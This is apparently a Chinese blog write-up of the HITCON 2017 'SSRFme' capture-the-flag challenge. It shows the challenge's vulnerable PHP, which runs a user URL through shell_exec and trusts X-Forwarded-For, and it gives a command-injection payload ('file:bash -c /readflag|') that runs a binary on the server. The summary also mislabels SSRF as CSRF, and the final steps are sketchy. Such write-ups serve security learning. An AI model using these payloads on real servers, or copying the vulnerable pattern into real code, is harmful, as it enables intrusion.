该博客详细讲述了PHP代码中的跨站请求伪造(SSRF)漏洞,通过构造恶意URL,作者展示了如何利用HTTP_X_FORWARDED_FOR头获取主机IP,并结合MD5加密实现路径绕过,最终成功读取/readflag文件。攻击者利用这种技术获取了flag。关键在于理解文件权限和路径控制在SSRF中的重要性。
[HITCON 2017]SSRFme
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
echo $_SERVER["REMOTE_ADDR"];
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
highlight_file(__FILE__);
?>
第一个if函数得到本机的ip,然后与orange一起进行md5加密。
通过url参数输入的内容会以GET命令执行,执行的结果保存到filename参数的值命名的文件里。
尝试读取根目录,将结果保存进test文件中。
构建payload:
/?url=/&filename=test
test保存在sandbox/下,然后将orange和主机ip进行32位md5加密。
可以看出下一步是读取readflag。
直接读取/readflag是不可以的,这样会将文件创建至根目录底下,而不是相对于所存页面的相对根目录。所以通过bash -c /readflag达到一个./readflag的作用。
构建payload:
?url=file:bash -c /readflag|&filename=test
访问目标地址,即可得到flag。
扫一扫
1689
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
